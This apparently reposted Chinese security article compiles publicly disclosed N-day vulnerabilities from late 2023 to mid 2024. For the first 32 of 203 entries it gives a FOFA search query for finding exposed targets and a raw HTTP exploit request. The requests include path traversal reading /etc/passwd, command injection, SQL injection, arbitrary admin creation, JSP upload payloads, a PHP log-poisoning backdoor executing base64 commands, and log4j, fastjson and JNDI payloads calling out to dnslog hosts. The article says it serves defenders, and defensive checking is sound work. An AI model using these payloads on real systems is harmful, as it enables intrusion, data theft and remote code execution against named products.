Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive and defensive exercises; we hope this article is of some help to defenders. Defenders can use its contents to check their own exposure.

Vulnerability sources: This article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few POCs that are too long are replaced with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.


Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).


Table of Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo endpoint SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 admin backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload endpoint file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC List

02

1. StarRocks MPP database unauthorized access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"
Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA:icon_hash="-1344736688"
After logging into the backend with the default account admin, send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-1 login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST request; the planted code executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the test target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou (用友) NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou (用友) NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou (用友) NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou (用友) NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou (用友) NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou (用友) NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou (用友) NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou (用友) NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

